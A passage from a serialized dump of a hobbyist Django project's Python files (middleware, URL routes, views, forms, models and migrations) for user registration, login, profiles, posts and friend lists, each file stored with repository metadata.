main():\n\tsr_global = 18000\n\ttrain_files,test_files = segregate()\n\t#\n\tsinger_names = []\n\tthreads = int(input('No of threads : '))\n\t#\n\t#\n\tts_features, ts_labels = parse(test_files,sr_global,threads,singer_names)\n\ttr_features, tr_labels = parse(train_files,sr_global,threads,singer_names)\n\t#\n\tts_labels = one_hot_encode(ts_labels)\n\ttr_labels = one_hot_encode(tr_labels)\n\t#\n\tf=open('objs.pkl','wb')\n\tpickle.dump([sr_global,singer_names,tr_features,tr_labels,ts_features,ts_labels],f)\n\tf.close()\n\n\nif __name__=='__main__':\n\tmain()\n\t#" }, { "alpha_fraction": 0.7198975086212158, "alphanum_fraction": 0.7292912006378174, "avg_line_length": 35.59375, "blob_id": "790a307c6e7c9a23c8360c45a1bbbcf16205f29a", "content_id": "c9ef8ee60fa494ce7a83116e7d4f25e05713d115", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1171, "license_type": "no_license", "max_line_length": 152, "num_lines": 32, "path": "/README.md", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "# SingerRecognization\n\nThis Project aims to recognize singer from audio clips of approximately 12 seconds.\n\nThe Training and Test WAV files should reside in the same folder as the .py files\nThe Project uses TensorFlow and Librosa libraries\nMuch of the audio processing code is took from https://aqibsaeed.github.io/2016-09-03-urban-sound-classification-part-1/\n\nThere are four .py files:\n\n recog.py --> vanilla version\n \n multirecog.py --> multithreaded version (significantly faster)\n \n export_builder.py --> multithreaded version (make model and export)\n \n import_learner.py --> import saved model and run on test data\n \nHow To Run (Train real time and test)??\n\n -> Make sure all the audio files are in the same folder as the .py files.\n \n -> Training Set files should have \\<person name\\>_i.wav format\n \n -> Test Set files should have t-\\<person name\\>_i.wav format\n \n \nHow to export model ??\n\n -> Run export_builder.py. It will train on files of format \\<person name\\>_i.wav and run the model on files of format t-\\<person name\\>_it.wav format.\n \n -> Run import_builder.py. 
It will run the files of format t-\\<person name\\>_i.wav on exported model.\n" }, { "alpha_fraction": 0.6728048324584961, "alphanum_fraction": 0.6883116960525513, "avg_line_length": 29.16958999633789, "blob_id": "c5bd68cd62ada81c0bedca94ff9e7d3592da838c", "content_id": "377eaaac2bf41a0c8a5a3c65ff9bc49df91fdc62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5159, "license_type": "no_license", "max_line_length": 103, "num_lines": 171, "path": "/multirecog.py", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "#REF : https://aqibsaeed.github.io/2016-09-03-urban-sound-classification-part-1/\n\n\nimport glob\nimport os\nimport librosa\nimport librosa.display\nimport numpy as np \nimport tensorflow as tf \nimport sklearn\nfrom multiprocessing import Process, Queue, Lock\n\ndef extract_feature(file_name):\n\tprint(file_name)\n\tX, sample_rate = librosa.load(file_name,sr=sr_global)\n\tstft = np.abs(librosa.stft(X))\n\tmfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T,axis=0)\n\tchroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T,axis=0)\n\tmel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T,axis=0)\n\tcontrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate,fmin=10).T,axis=0)\n\ttonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X),sr=sample_rate).T,axis=0)\n\treturn mfccs,chroma,mel,contrast,tonnetz,get_name(file_name)\n\ndef segregate():\n\ttrain_files =[]\n\ttest_files =[]\n\tfor i,fname in enumerate(os.listdir()):\n\t\tif fname.endswith('.wav'):\n\t\t\tif fname[:2]=='t-':\n\t\t\t\ttest_files.append(fname)\n\t\t\telse:\n\t\t\t\ttrain_files.append(fname)\n\treturn train_files,test_files\n\ndef get_name(file_name):\n\tif file_name[:2]=='t-':\n\t\treturn file_name[2:].split('_')[0]\n\telse:\n\t\treturn file_name.split('_')[0]\n\n\ndef return_singer_index(singer_name):\n\tglobal singers; global singer_names;\n\tif singer_name in singer_names:\n\t\treturn singer_names.index(singer_name)\n\telse:\n\t\tsinger_names.append(singer_name)\n\t\tsingers += 1\n\t\treturn singer_names.index(singer_name)\n\ndef parse_extension(fname, out_q, lock):\n\tlock.acquire()\n\tmfccs,chroma,mel,contrast,tonnetz,sname = extract_feature(fname)\n\tout_q.put([mfccs,chroma,mel,contrast,tonnetz,sname])\n\tlock.release()\n\ndef parse(file_names_list):\n\tglobal threads\n\tout_q = Queue()\n\tfeatures, labels = np.empty((0,193)), np.empty(0)\n\tlocks = [Lock() for i in range(0,threads)]\n\t#\n\tfor i,fname in enumerate(file_names_list):\n\t\tProcess(target=parse_extension, args=(fname,out_q,locks[i%threads])).start()\n\t#\n\tfor i in range(0,threads):\n\t\tlocks[i].acquire(block=True)\n\t#\n\tprint(\"~~~\")\n\tfor i,fname in enumerate(file_names_list):\n\t\ttmp = out_q.get()\n\t\t#mfccs,chroma,mel,contrast,tonnetz,sname = tmp[0],tmp[1],tmp[2],tmp[3],tmp[4],tmp[5]\n\t\text_features = np.hstack(tmp[:-1])\n\t\tfeatures = np.vstack([features,ext_features])\n\t\tlabels = np.append(labels,return_singer_index(tmp[5]))\n\treturn np.array(features), np.array(labels, dtype=np.int)\n\ndef one_hot_encode(labels):\n\tn_labels = len(labels)\n\tn_unique_labels = len(np.unique(labels))\n\tone_hot_encode = np.zeros((n_labels,n_unique_labels))\n\tone_hot_encode[np.arange(n_labels), labels] = 1\n\treturn one_hot_encode\n\n\nif __name__=='__main__':\n\tsr_global = 18000\n\t\n\ttrain_files,test_files = segregate()\n\tsingers = 0\n\tsinger_names = []\n\tthreads = 
int(input('No of threads : '))\n\n\n\tts_features, ts_labels = parse(test_files)\n\ttr_features, tr_labels = parse(train_files)\n\n\ttr_labels = one_hot_encode(tr_labels)\n\tts_labels = one_hot_encode(ts_labels)\n\n\n\n\n\ttraining_epochs = 2000\n\tn_dim = tr_features.shape[1]\n\tn_classes = len(singer_names)\n\tn_hidden_layers = int(input('Give no of Hidden Layers : '))\n\tn_hidden_units_i = [n_dim]\n\n\tfor i in range(0,n_hidden_layers):\n\t\tn_hidden_units_i.append(int(input('Units for Layer %d : '%(i))))\n\n\tsd = 1/np.sqrt(n_dim)\n\tlearning_rate = 0.01\n\n\n\n\tX = tf.placeholder(tf.float32,[None,n_dim])\n\tY = tf.placeholder(tf.float32,[None,n_classes])\n\n\n\tht = X\n\n\tfor i in range(0,n_hidden_layers):\n\t\tW_i = tf.Variable(tf.random_normal([n_hidden_units_i[i],n_hidden_units_i[i+1]], mean = 0, stddev=sd))\n\t\tb_i = tf.Variable(tf.random_normal([n_hidden_units_i[i+1]], mean = 0, stddev=sd))\n\t\tif i%2:\n\t\t\th_i = tf.nn.sigmoid(tf.matmul(ht,W_i) + b_i)\n\t\telse:\n\t\t\th_i = tf.nn.tanh(tf.matmul(ht,W_i) + b_i)\n\t\tht = h_i\n\n\t# W = tf.Variable(tf.random_normal([n_hidden_units_three,n_classes], mean = 0, stddev=sd))\n\tW = tf.Variable(tf.random_normal([n_hidden_units_i[n_hidden_layers],n_classes], mean = 0, stddev=sd))\n\tb = tf.Variable(tf.random_normal([n_classes], mean = 0, stddev=sd))\n\t#y_ = tf.nn.softmax(tf.matmul(h_3,W) + b)\n\ty_ = tf.nn.softmax(tf.matmul(ht,W) + b)\n\n\tinit = tf.initialize_all_variables()\n\n\n\tcost_function = -tf.reduce_sum(Y * tf.log(y_))\n\toptimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost_function)\n\n\tcorrect_prediction = tf.equal(tf.argmax(y_,1), tf.argmax(Y,1))\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n\n\n\tcost_history = np.empty(shape=[1],dtype=float)\n\ty_true, y_pred = None, None\n\twith tf.Session() as sess:\n\t\tsess.run(init)\n\t\tfor epoch in range(training_epochs):\n\t\t\t_,cost = sess.run([optimizer,cost_function],feed_dict={X:tr_features,Y:tr_labels})\n\t\t\tcost_history = np.append(cost_history,cost)\n\t\t\n\t\ty_pred = sess.run(tf.argmax(y_,1),feed_dict={X: ts_features})\n\t\ty_true = sess.run(tf.argmax(ts_labels,1))\n\t\tprint('Test accuracy: ',round(sess.run(accuracy, feed_dict={X: ts_features, Y: ts_labels}) , 3))\n\n\n\n\n\trelation = [[singer_names[i],i] for i in range(0,len(singer_names))]\n\tprint (relation)\n\tprint (y_true)\n\tprint (y_pred)\n\tp,r,f,s = sklearn.metrics.precision_recall_fscore_support(y_true, y_pred, average='micro')\n\tprint (\"F-Score:\", round(f,3))\n" }, { "alpha_fraction": 0.6762983798980713, "alphanum_fraction": 0.6949952840805054, "avg_line_length": 31.888198852539062, "blob_id": "6c24330abfa664faba0b9223238d7f41cc5c65de", "content_id": "a00b1dcdb6b5b019a522a26c31e32e0a4ab19c9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5295, "license_type": "no_license", "max_line_length": 102, "num_lines": 161, "path": "/recog.py", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "#REF : https://aqibsaeed.github.io/2016-09-03-urban-sound-classification-part-1/\n\nimport glob\nimport os\nimport librosa\nimport librosa.display\nimport numpy as np \nimport tensorflow as tf \nimport sklearn\n\nsr_global = 18000\n\ndef extract_feature(file_name):\n\tprint(file_name)\n\tX, sample_rate = librosa.load(file_name,sr=sr_global)\n\tstft = np.abs(librosa.stft(X))\n\tmfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T,axis=0)\n\tchroma = 
np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T,axis=0)\n\tmel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T,axis=0)\n\tcontrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate,fmin=10).T,axis=0)\n\ttonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X),sr=sample_rate).T,axis=0)\n\treturn mfccs,chroma,mel,contrast,tonnetz\n\ndef segregate():\n\ttrain_files =[]\n\ttest_files =[]\n\tfor i,fname in enumerate(os.listdir()):\n\t\tif fname.endswith('.wav'):\n\t\t\tif fname[:2]=='t-':\n\t\t\t\ttest_files.append(fname)\n\t\t\telse:\n\t\t\t\ttrain_files.append(fname)\n\treturn train_files,test_files\n\ntrain_files,test_files = segregate()\n\n# print(train_files)\n# print(test_files)\ndef get_name(file_name):\n\tif file_name[:2]=='t-':\n\t\treturn file_name[2:].split('_')[0]\n\telse:\n\t\treturn file_name.split('_')[0]\n\nsingers = 0\nsinger_names = []\n\ndef return_singer_index(singer_name):\n\tglobal singers; global singer_names;\n\tif singer_name in singer_names:\n\t\treturn singer_names.index(singer_name)\n\telse:\n\t\tsinger_names.append(singer_name)\n\t\tsingers += 1\n\t\treturn singer_names.index(singer_name)\n\ndef parse_audio_files(file_names_list):\n\tfeatures, labels = np.empty((0,193)), np.empty(0)\n\tfor fname in file_names_list:\n\t\tmfccs,chroma,mel,contrast,tonnetz = extract_feature(fname)\n\t\text_features = np.hstack([mfccs,chroma,mel,contrast,tonnetz])\n\t\tfeatures = np.vstack([features,ext_features])\n\t\tlabels = np.append(labels,return_singer_index(get_name(fname)))\n\treturn np.array(features), np.array(labels, dtype=np.int)\n\ndef one_hot_encode(labels):\n\tn_labels = len(labels)\n\tn_unique_labels = len(np.unique(labels))\n\tone_hot_encode = np.zeros((n_labels,n_unique_labels))\n\tone_hot_encode[np.arange(n_labels), labels] = 1\n\treturn one_hot_encode\n\ntr_features, tr_labels = parse_audio_files(train_files)\nts_features, ts_labels = parse_audio_files(test_files)\n\ntr_labels = one_hot_encode(tr_labels)\nts_labels = one_hot_encode(ts_labels)\n\n\n\n\ntraining_epochs = 2000\nn_dim = tr_features.shape[1]\nn_classes = len(singer_names)\nn_hidden_layers = int(input('Give no of Hidden Layers : '))\nn_hidden_units_i = [n_dim]\nfor i in range(0,n_hidden_layers):\n\tn_hidden_units_i.append(int(input('Units for Layer %d : '%(i))))\n# n_hidden_units_one = 52\n# n_hidden_units_two = 56\n# n_hidden_units_three = 60\nsd = 1/np.sqrt(n_dim)\nlearning_rate = 0.01\n\n\n\nX = tf.placeholder(tf.float32,[None,n_dim])\nY = tf.placeholder(tf.float32,[None,n_classes])\n\n# W_1 = tf.Variable(tf.random_normal([n_dim,n_hidden_units_one], mean = 0, stddev=sd))\n# b_1 = tf.Variable(tf.random_normal([n_hidden_units_one], mean = 0, stddev=sd))\n# h_1 = tf.nn.tanh(tf.matmul(X,W_1) + b_1)\n\n# W_2 = tf.Variable(tf.random_normal([n_hidden_units_one,n_hidden_units_two], mean = 0, stddev=sd))\n# b_2 = tf.Variable(tf.random_normal([n_hidden_units_two], mean = 0, stddev=sd))\n# h_2 = tf.nn.sigmoid(tf.matmul(h_1,W_2) + b_2)\n\n# W_3 = tf.Variable(tf.random_normal([n_hidden_units_two,n_hidden_units_three], mean = 0, stddev=sd))\n# b_3 = tf.Variable(tf.random_normal([n_hidden_units_three], mean = 0, stddev=sd))\n# h_3 = tf.nn.sigmoid(tf.matmul(h_2,W_3) + b_3)\n\nht = X\n\nfor i in range(0,n_hidden_layers):\n\tW_i = tf.Variable(tf.random_normal([n_hidden_units_i[i],n_hidden_units_i[i+1]], mean = 0, stddev=sd))\n\tb_i = tf.Variable(tf.random_normal([n_hidden_units_i[i+1]], mean = 0, stddev=sd))\n\tif i%2:\n\t\th_i = tf.nn.sigmoid(tf.matmul(ht,W_i) 
+ b_i)\n\telse:\n\t\th_i = tf.nn.tanh(tf.matmul(ht,W_i) + b_i)\n\tht = h_i\n\n# W = tf.Variable(tf.random_normal([n_hidden_units_three,n_classes], mean = 0, stddev=sd))\nW = tf.Variable(tf.random_normal([n_hidden_units_i[n_hidden_layers],n_classes], mean = 0, stddev=sd))\nb = tf.Variable(tf.random_normal([n_classes], mean = 0, stddev=sd))\n#y_ = tf.nn.softmax(tf.matmul(h_3,W) + b)\ny_ = tf.nn.softmax(tf.matmul(ht,W) + b)\n\ninit = tf.initialize_all_variables()\n\n\ncost_function = -tf.reduce_sum(Y * tf.log(y_))\noptimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost_function)\n\ncorrect_prediction = tf.equal(tf.argmax(y_,1), tf.argmax(Y,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n\n\ncost_history = np.empty(shape=[1],dtype=float)\ny_true, y_pred = None, None\nwith tf.Session() as sess:\n\tsess.run(init)\n\tfor epoch in range(training_epochs):\n\t\t_,cost = sess.run([optimizer,cost_function],feed_dict={X:tr_features,Y:tr_labels})\n\t\tcost_history = np.append(cost_history,cost)\n\t\n\ty_pred = sess.run(tf.argmax(y_,1),feed_dict={X: ts_features})\n\ty_true = sess.run(tf.argmax(ts_labels,1))\n\tprint('Test accuracy: ',round(sess.run(accuracy, feed_dict={X: ts_features, Y: ts_labels}) , 3))\n\n\n\n\nrelation = [[singer_names[i],i] for i in range(0,len(singer_names))]\nprint (relation)\nprint (y_true)\nprint (y_pred)\np,r,f,s = sklearn.metrics.precision_recall_fscore_support(y_true, y_pred, average='micro')\nprint (\"F-Score:\", round(f,3))\n" }, { "alpha_fraction": 0.6761598587036133, "alphanum_fraction": 0.6903996467590332, "avg_line_length": 24.91666603088379, "blob_id": "db39197e8ca8ac742560abd4fc808dba320f0890", "content_id": "803e6b6a71cf466d48994011227c54400799ab0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2177, "license_type": "no_license", "max_line_length": 103, "num_lines": 84, "path": "/import_learner.py", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "#REF : https://aqibsaeed.github.io/2016-09-03-urban-sound-classification-part-1/\n#REF : https://docs.python.org/2/library/multiprocessing.html\n#REF : https://www.tensorflow.org/serving/serving_basic\n#REF : http://cv-tricks.com/tensorflow-tutorial/save-restore-tensorflow-models-quick-complete-tutorial/\n\nimport sys\nimport glob\nimport os\nimport librosa\nimport numpy as np \nimport tensorflow as tf \nimport sklearn\nfrom sklearn import metrics\nfrom multiprocessing import Process, Queue, Lock\nfrom export_builder import parse, one_hot_encode\n\ndef importAdditionalData():\n\tsinger_names = []\n\tF=open('trained/additional.txt')\n\tn=int(F.readline()[:-1])\n\tfor i in range(0,n):\n\t\tsinger_names.append(F.readline()[:-1])\n\tn=int(F.readline()[:-1])\n\tn_hidden_units_i = []\n\tfor i in range(0,n):\n\t\tn_hidden_units_i.append(int(F.readline()[:-1]))\n\t#\n\treturn singer_names,n_hidden_units_i\n\ndef getTestFiles():\n\ttest_files = []\n\tfor i,fname in enumerate(os.listdir()):\n\t\tif fname.startswith('t-') and fname.endswith('.wav'):\n\t\t\ttest_files.append(fname)\n\treturn test_files\n\n\ndef mainprog():\n\t#\n\t#\n\tsinger_names, n_hidden_units_i = importAdditionalData()\n\tsr_global =18000\n\tthreads = int(input('No of threads : '))\n\ttest_files=getTestFiles()\n\t#\n\tts_features, ts_labels = parse(test_files,sr_global,threads,singer_names)\n\tts_labels = one_hot_encode(ts_labels)\n\t#\n\t#\n\t#\n\tn_dim = ts_features.shape[1]\n\tn_classes = len(singer_names)\n\tn_hidden_layers 
= len(n_hidden_units_i)\n\tn_hidden_units_i.insert(0,n_dim)\n\tsd = 1/np.sqrt(n_dim)\n\t#\n\t#\n\t#\n\tsess = tf.Session()\n\tsaver = tf.train.import_meta_graph('trained/model.meta')\n\tsaver.restore(sess,'trained/model')\n\t#\n\tgraph=tf.get_default_graph()\n\tX = graph.get_tensor_by_name('X:0')\n\tY = graph.get_tensor_by_name('Y:0')\n\top = graph.get_tensor_by_name('y_:0')\n\t#\n\ty_pred = sess.run(tf.argmax(op,1), feed_dict={X: ts_features})\n\ty_true = sess.run(tf.argmax(ts_labels,1))\n\t#\n\t#\n\t#\n\trelation = [[singer_names[i],i] for i in range(0,len(singer_names))]\n\tprint(relation)\n\tprint(y_true)\n\tprint(y_pred)\n\tp,r,f,s = metrics.precision_recall_fscore_support(y_true, y_pred, average='micro')\n\tprint (\"F-Score:\", round(f,3))\n\t#\n\t#\n\nif __name__=='__main__':\n\tmainprog()\n\t#\n" }, { "alpha_fraction": 0.6539297699928284, "alphanum_fraction": 0.6651133894920349, "avg_line_length": 29.37735939025879, "blob_id": "3344be4bab2babfbbbaf5f598b89c8cf5b73f710", "content_id": "515fbf1e9b8e8069db625babb796591f9b8c5a22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3219, "license_type": "no_license", "max_line_length": 120, "num_lines": 106, "path": "/export_model.py", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "import sys\nimport glob\nimport os\nimport numpy as np\nimport tensorflow as tf \nimport sklearn\nfrom sklearn import metrics\n#from multiprocessing import Process, Queue, Lock\nimport pickle\n\n\ndef exportAdditionalData(singer_names,n_hidden_units_i):\n\t#\n\tF=open('trained/additional.txt','w')\n\tF.write(str(len(singer_names))+'\\n')\n\tfor singer_name in singer_names:\n\t\tF.write(singer_name+'\\n')\n\tF.write(str(len(n_hidden_units_i)-1)+'\\n')\n\tfor units in n_hidden_units_i[1:]:\n\t\tF.write(str(units)+'\\n')\n\tF.close()\n\n\n\ndef main():\n\tvarfile=open('objs.pkl','rb')\n\tsr_global,singer_names,tr_features,tr_labels,ts_features,ts_labels = pickle.load(varfile)\n\tvarfile.close()\n\t#\n\t#\n\ttraining_epochs = 2000\n\tn_dim = tr_features.shape[1]\n\tn_classes = len(singer_names)\n\tn_hidden_layers = int(input('Give no of Hidden Layers : '))\n\tn_hidden_units_i = [n_dim]\n\t#\n\tfor i in range(0,n_hidden_layers):\n\t\tn_hidden_units_i.append(int(input('Units for Layer %d : '%(i))))\n\t#\n\tsd = 1/np.sqrt(n_dim)\n\tlearning_rate = 0.01\n\t#\n\t#\n\t#\n\tX = tf.placeholder(dtype=tf.float32,shape=[None,n_dim],name='X')\n\tY = tf.placeholder(dtype=tf.float32,shape=[None,n_classes],name='Y')\n\t#\n\t#\n\tht = X\n\t#hiddenLayerVars = []\n\t#\n\tfor i in range(0,n_hidden_layers):\n\t\tW_i = tf.Variable(tf.random_normal([n_hidden_units_i[i],n_hidden_units_i[i+1]], mean = 0, stddev=sd),name='Wh_%d'%(i))\n\t\tb_i = tf.Variable(tf.random_normal([n_hidden_units_i[i+1]], mean = 0, stddev=sd),name='bh_%d'%(i))\n\t\tif i%2:\n\t\t\th_i = tf.nn.sigmoid(tf.matmul(ht,W_i) + b_i,name='hh_%d'%(i))\n\t\telse:\n\t\t\th_i = tf.nn.tanh(tf.matmul(ht,W_i) + b_i,name='hh_%d'%(i))\n\t\t#hiddenLayerVars.append([W_i,b_i,h_i])\n\t\tht = h_i\n\n\t# W = tf.Variable(tf.random_normal([n_hidden_units_three,n_classes], mean = 0, stddev=sd))\n\tW = tf.Variable(tf.random_normal([n_hidden_units_i[n_hidden_layers],n_classes], mean = 0, stddev=sd),name='W')\n\tb = tf.Variable(tf.random_normal([n_classes], mean = 0, stddev=sd),name='b')\n\t#y_ = tf.nn.softmax(tf.matmul(h_3,W) + b)\n\ty_ = tf.nn.softmax(tf.matmul(ht,W) + b,name='y_')\n\n\tinit = tf.initialize_all_variables()\n\n\n\tcost_function = 
-tf.reduce_sum(Y * tf.log(y_))\n\toptimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost_function)\n\n\tcorrect_prediction = tf.equal(tf.argmax(y_,1), tf.argmax(Y,1))\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\tsaver = tf.train.Saver()\n\n\n\tcost_history = np.empty(shape=[1],dtype=float)\n\ty_true, y_pred = None, None\n\twith tf.Session() as sess:\n\t\tsess.run(init)\n\t\tfor epoch in range(training_epochs):\n\t\t\t_,cost = sess.run([optimizer,cost_function],feed_dict={X:tr_features,Y:tr_labels})\n\t\t\tcost_history = np.append(cost_history,cost)\n\t\t#\n\t\tsaver.save(sess, 'trained/model')\n\t\ty_pred = sess.run(tf.argmax(y_,1),feed_dict={X: ts_features})\n\t\ty_true = sess.run(tf.argmax(ts_labels,1))\n\t\tprint('Test accuracy: ',round(sess.run(accuracy, feed_dict={X: ts_features, Y: ts_labels}) , 3))\n\n\texportAdditionalData(singer_names,n_hidden_units_i)\n\n\trelation = [[singer_names[i],i] for i in range(0,len(singer_names))]\n\tprint (relation)\n\tprint (y_true)\n\tprint (y_pred)\n\tp,r,f,s = metrics.precision_recall_fscore_support(y_true, y_pred, average='micro')\n\tprint (\"F-Score:\", round(f,3))\n\t#\n\t#\n\nif __name__=='__main__':\n\tmain()\n\t#" } ]
6
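
The row above archives a TensorFlow 1.x singer-recognition project (ritzvik/SingerRecognization): 193-dimensional audio features (MFCC, chroma, mel, spectral contrast, tonnetz) feed a stack of hidden layers whose widths are read from stdin and whose activations alternate — tanh on even-indexed layers, sigmoid on odd — before a softmax output trained by plain gradient descent on -sum(Y * log(y_)). A minimal NumPy sketch of that layer-stacking pattern (the function name, seed, and the 52/56 widths are illustrative; 193 is the feature width used throughout the archived scripts):

import numpy as np

def build_forward(n_hidden_units, seed=0):
    # n_hidden_units = [n_dim, units_0, units_1, ...], as in export_model.py
    rng = np.random.default_rng(seed)
    sd = 1.0 / np.sqrt(n_hidden_units[0])          # same init scale as the repo
    params = []
    for i in range(len(n_hidden_units) - 1):
        W = rng.normal(0.0, sd, (n_hidden_units[i], n_hidden_units[i + 1]))
        b = rng.normal(0.0, sd, (n_hidden_units[i + 1],))
        params.append((W, b))

    def forward(x):
        h = x
        for i, (W, b) in enumerate(params):
            z = h @ W + b
            # even-indexed layers use tanh, odd-indexed use sigmoid,
            # matching the alternation in the archived training loop
            h = 1.0 / (1.0 + np.exp(-z)) if i % 2 else np.tanh(z)
        return h

    return forward

f = build_forward([193, 52, 56])        # 52/56 are illustrative layer widths
print(f(np.zeros((1, 193))).shape)      # -> (1, 56)

Keeping the forward pass as a closure over the weight list mirrors the repo's ht = h_i chaining without TF1's since-deprecated placeholder/Session machinery.
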
igarashi02/CompetitionProgramming
https://github.com/igarashi02/CompetitionProgramming
cd28a9e4d97ea056ad3fb1440622ab697812331b
43a3031d41e2630d4f130ee3f81fdfeddd7f29f7
cf06d06ac5ca1a65548bf063d192a9fcbf49b64a
refs/heads/master
2023-02-13T20:28:29.348296
2021-01-15T05:13:51
2021-01-15T05:13:51
236,641,149
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.84375, "alphanum_fraction": 0.84375, "avg_line_length": 9.666666984558105, "blob_id": "34a878f037e7f69a973f7f0b7b8e90812884db97", "content_id": "793313ac5ff4258bc747f5524f3d82aab9d01438", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 32, "license_type": "no_license", "max_line_length": 24, "num_lines": 3, "path": "/README.md", "repo_name": "igarashi02/CompetitionProgramming", "src_encoding": "UTF-8", "text": "# CompetitionProgramming\n\nPaiza\n" }, { "alpha_fraction": 0.5662431716918945, "alphanum_fraction": 0.5762250423431396, "avg_line_length": 21.040000915527344, "blob_id": "df4d9fe66379dcc60ae7b1812a2146746f61b800", "content_id": "ad3aaa1e713277c45a380ff8a1dacb98e9155433", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1134, "license_type": "no_license", "max_line_length": 69, "num_lines": 50, "path": "/Paiza/JavaScript/B073/main.js", "repo_name": "igarashi02/CompetitionProgramming", "src_encoding": "UTF-8", "text": "process.stdin.resume();\nprocess.stdin.setEncoding('utf8');\n// 自分の得意な言語で\n// Let's チャレンジ!!\n\nvar lines = [];\nvar reader = require('readline').createInterface({\n input: process.stdin,\n output: process.stdout\n});\nreader.on('line', (line) => {\n lines.push(line);\n});\nreader.on('close', () => {\n const n = parseInt(lines[0].split(\" \")[0])\n const m = parseInt(lines[0].split(\" \")[1])\n\n const trees_s = lines[1].split(\" \")\n const trees = trees_s.map(v => parseInt(v));\n\n const check = parseInt(lines[2])\n\n lines.slice(check).forEach(v => {\n const start_end = v.split(\" \")\n const start = parseInt(start_end[0])-1\n const end = parseInt(start_end[1])\n\n const target = trees.slice(start, end)\n\n const sum = target.reduce((prev, current) => {\n return prev+current\n })\n\n const up = m - Math.floor(sum/target.length)\n\n const target_arr = [...Array(end-start).keys()].map(i => i+start)\n target_arr.forEach(v => {\n if(up > 0){\n trees[v] = trees[v] + up\n }\n })\n })\n\n let str = \"\";\n trees.forEach(v => {\n str = str + v + \" \"\n })\n\n console.log(str);\n});\n" }, { "alpha_fraction": 0.5797101259231567, "alphanum_fraction": 0.5990338325500488, "avg_line_length": 17.81818199157715, "blob_id": "9ec8c0723b2fba91295ce24bcb5a3190bdad5c73", "content_id": "e2871afa45d5e8344a1dea462e088a4b8e0dbac2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "YAML", "length_bytes": 207, "license_type": "no_license", "max_line_length": 32, "num_lines": 11, "path": "/Paiza/Go/docker-compose.yml", "repo_name": "igarashi02/CompetitionProgramming", "src_encoding": "UTF-8", "text": "version: '3'\nservices:\n app:\n image: golang:latest\n container_name: go_container\n tty: true\n environment:\n - GO111MODULE=on\n volumes:\n - ./:/go/src/app\n working_dir: /go/src/app\n" }, { "alpha_fraction": 0.5347222089767456, "alphanum_fraction": 0.5486111044883728, "avg_line_length": 15.941176414489746, "blob_id": "e4f12392ae47c79e7c5b99ba6990c22f19219524", "content_id": "07441fbdfc8d6f1f9ba6bb74a408208f45984a93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 316, "license_type": "no_license", "max_line_length": 32, "num_lines": 17, "path": "/Paiza/Python/B073/main.py", "repo_name": "igarashi02/CompetitionProgramming", "src_encoding": "UTF-8", "text": "# import fileinput\n# nm = input().split(\" \")\n# n = int(nm[0])\n# m = int(nm[1])\n#\n# trees = 
input().split(\" \")\n#\n# for line in fileinput.input():\n# print(line)\n\n # 行数を取得\nnum_lines = int(input())\n\n# 1行ずつ取り出し\nfor i in range(num_lines):\n line = input()\n print(i+1, \"行目:\" + line)\n" }, { "alpha_fraction": 0.4968944191932678, "alphanum_fraction": 0.5124223828315735, "avg_line_length": 19.125, "blob_id": "54d95375eea56620e29ffcd584b94cda6eea264e", "content_id": "9e1b997c94a5794c2f590e829f6e088843d0af14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 34, "num_lines": 16, "path": "/Paiza/Python/C075/main.py", "repo_name": "igarashi02/CompetitionProgramming", "src_encoding": "UTF-8", "text": "input_line = input()\ninput_list = input_line.split(\" \")\nn = int(input_list[0])\nm = int(input_list[1])\np = 0\n\nfor i in range(m):\n input_line = input()\n price = int(input_line)\n if p < price:\n n = n - price\n point = int(price*0.1)\n p = p + point\n else:\n p = p - price\n print(n, p)\n" } ]
5
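
The row above collects paiza practice solutions (igarashi02/CompetitionProgramming); the Japanese boilerplate comments in B073/main.js translate roughly to "in your favorite language — let's challenge!!", and B073/main.py's comments read "get the line count" / "take lines one at a time". The C075 solution applies a point-card rule: when the price exceeds the point balance, pay cash and earn 10% of the price back as points; otherwise pay entirely from points. The same rule as a pure function (function name and sample figures are illustrative):

def purchase(cash, points, price):
    # price exceeds the point balance: pay cash, earn 10% back as points
    if points < price:
        return cash - price, points + int(price * 0.1)
    # otherwise the purchase is covered entirely by points
    return cash, points - price

print(purchase(1000, 0, 300))    # -> (700, 30)
print(purchase(700, 30, 20))     # -> (700, 10)
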
opavelkachalo/music_controller
https://github.com/opavelkachalo/music_controller
b6b5590e87886609cb2410ffa5f01295f51bc20e
